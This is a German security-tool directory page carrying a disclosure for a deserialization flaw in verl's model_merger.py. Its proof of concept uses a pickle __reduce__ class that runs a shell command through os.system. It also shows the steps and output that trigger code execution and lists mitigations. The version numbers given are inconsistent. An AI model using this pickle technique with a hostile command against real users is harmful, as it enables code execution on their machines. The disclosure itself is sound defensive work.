Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50461 — Technische Details und Exploit für CVE-2025-50461 | Kitploit
Tools/GitHubGitHub/anchor0221/cve-2025-50461
Payload-GenerierungSchwachstellenanalyseExploitationPapers & ForschungLernen & BildungBinary-Exploitation
GitHubanchor0221/cve-2025-50461

CVE-2025-50461

Technische Details und Exploit für CVE-2025-50461

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-50461: Remote Code Execution durch unsichere Modell-Deserialisierung in Verl

Status: RESERVIERT
Diese CVE-ID wurde vergeben, ist aber noch nicht in der offiziellen CVE-Liste veröffentlicht.

Eine Deserialisierungsschwachstelle besteht in Volcengine's verl 3.0.0, speziell im Skript scripts/model_merger.py bei Verwendung des „fsdp“-Backends. Das Skript ruft torch.load() mit weights_only=False auf benutzerbereitgestellten .pt-Dateien auf, was es Angreifern ermöglicht, beliebigen Code auszuführen, wenn eine böswillig erstellte Modelldatei geladen wird. Ein Angreifer kann dies ausnutzen, indem er ein Opfer dazu bringt, eine böswillige Modelldatei mit einem bestimmten Dateinamenmuster in ein lokales Verzeichnis herunterzuladen und dort abzulegen. Diese Schwachstelle kann zur Ausführung beliebigen Codes mit den Berechtigungen des Benutzers führen, der das Skript ausführt.

Beschreibung

Betroffenes Repository

  • Projekt: volcengine/verl
  • Betroffene Versionen: <= v0.4.0
Tool herunterladen
  • Datei: scripts/model_merger.py
  • GitHub Permalink: https://github.com/volcengine/verl/blob/v0.3.0.post1/scripts/model_merger.py#L87
  • Abhängigkeit: PyTorch < 2.6.0
  • Proof of Concept (PoC)

    Schritt 1: Erstellen einer bösartigen Modelldatei (malicious.pt)

    root@kitploit:~
    import pickle
    import os
    
    class Malicious:
        def __reduce__(self):
            return (os.system, ("mkdir HACKED!",))
    
    with open("malicious.pt", "wb") as f:
        pickle.dump(Malicious(), f)
    

    Schritt 2: Umbenennen und Ablegen

    root@kitploit:~
    mv malicious.pt model_world_size_4_rank_0.pt
    mkdir TESTS
    mv model_world_size_4_rank_0.pt TESTS/
    

    Schritt 3: Ausführen des verwundbaren Skripts

    root@kitploit:~
    python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
    

    Ergebnis

    root@kitploit:~
    root@99137c7690ee:/workspace/verl-main# python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
    Traceback (most recent call last):
      File "/workspace/verl-main/scripts/model_merger.py", line 440, in <module>
        convert_fsdp_checkpoints_to_hfmodels()
      File "/workspace/verl-main/scripts/model_merger.py", line 88, in convert_fsdp_checkpoints_to_hfmodels
        state_dict = torch.load(os.path.join(local_dir, f'model_world_size_{world_size}_rank_{rank}.pt'),
      File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1384, in load
        return _legacy_load(
      File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1630, in _legacy_load
        raise RuntimeError("Invalid magic number; corrupt file?")
    RuntimeError: Invalid magic number; corrupt file?
    root@99137c7690ee:/workspace/verl-main# ls
    'HACKED!'   Notice.txt   TESTS   docker   examples   outputs   pyproject.toml       requirements.txt          scripts    test_prime.sh   tmp    verl.egg-info
     LICENSE    README.md    data    docs     patches    recipe    requirements_sglang.txt   setup.py   tests           verl   verl_demo.log
    

    Der Befehl mkdir HACKED! wird auf dem System des Opfers ausgeführt.

    Abhilfemaßnahmen

    • Upgrade auf PyTorch Version 2.6.0 oder höher, die standardmäßig weights_only=True verwendet, wodurch Deserialisierungsrisiken verringert werden.
    • Code anpassen, um beim Aufruf von torch.load explizit weights_only=True zu setzen.
    • Validierung implementieren, um die Integrität der Modelldatei vor dem Laden zu überprüfen.
    • Benutzer schulen, keine Modelle aus nicht vertrauenswürdigen Quellen zu laden.

    Beispiel für sicheres Laden:

    root@kitploit:~
    state_dict = torch.load(path, map_location="cpu", weights_only=True)
    

    CVE-Status

    FeldWert
    CVE-IDCVE-2025-50461
    CVSS-ScoreTBD
    CWECWE-502: Deserialisierung nicht vertrauenswürdiger Daten
    Meldedatum2025-04-30
    Offenlegungsdatum2025-08-15
    Betroffene Version<= v0.4.0
    Fix-Version

    Autor

    • Entdeckt von: Yu Rong (戎誉) und Hao Fan (凡浩)
    • Kontakt: [[email protected]]